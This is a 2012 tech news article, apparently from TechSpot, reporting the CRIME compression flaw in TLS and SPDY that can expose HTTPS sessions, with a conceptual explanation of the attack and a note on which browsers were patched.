Compression flaw may allow for HTTPS hijacking on some browsers

By on September 13, 2012, 4:00 PM

Security researchers have discovered a SSL-based compression flaw which allows hackers to hijack HTTPS-encrypted web sessions. HTTPS, or HTTP Secure, is the same protocol used by online stores, banks and other websites to encrypt the sensitive data transmissions across the net. 

The exploit, dubbed as CRIME or Compression Ratio Info-leak Made Easy, uses an encrypted data stream's own data-compression methods against itself. Check out this article at Ars Technica for a thorough explanation of what researchers discovered.

Compression is essentially a form of a pattern matching -- the feat works by algorithmically finding patterns in information and boiling those patterns down to a smaller but seemingly more random data set. By injecting plain-text transmissions alongside the encrypted ones, clever cryptographers were able to monitor and analyze changes created by compression techniques (i.e. deflate and SPDY), eventually unraveling the cipher.

In order for the exploit to work though, a user's Internet browser must establish a secure connection via TLS compression (deflate) or SPDY (a protocol developed by Google). Most modern browsers support at least one of these technologies but Internet Explorer users will be glad to hear they are safe -- Microsoft's browser has never supported either. Somewhat ironically, this is an example of less being more.

Recent releases of Firefox and Chrome have been patched, but it is unknown if Opera, Safari or other browsers are still susceptible. In particular, mobile browsers are a key concern -- researchers believe it is very likely smartphone browsers remain vulnerable.




User Comments: 1

Got something to say? Post a comment
PinothyJ said:

Why are all the smart people crooks?

...

Load all comments...

Add New Comment

TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...
Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.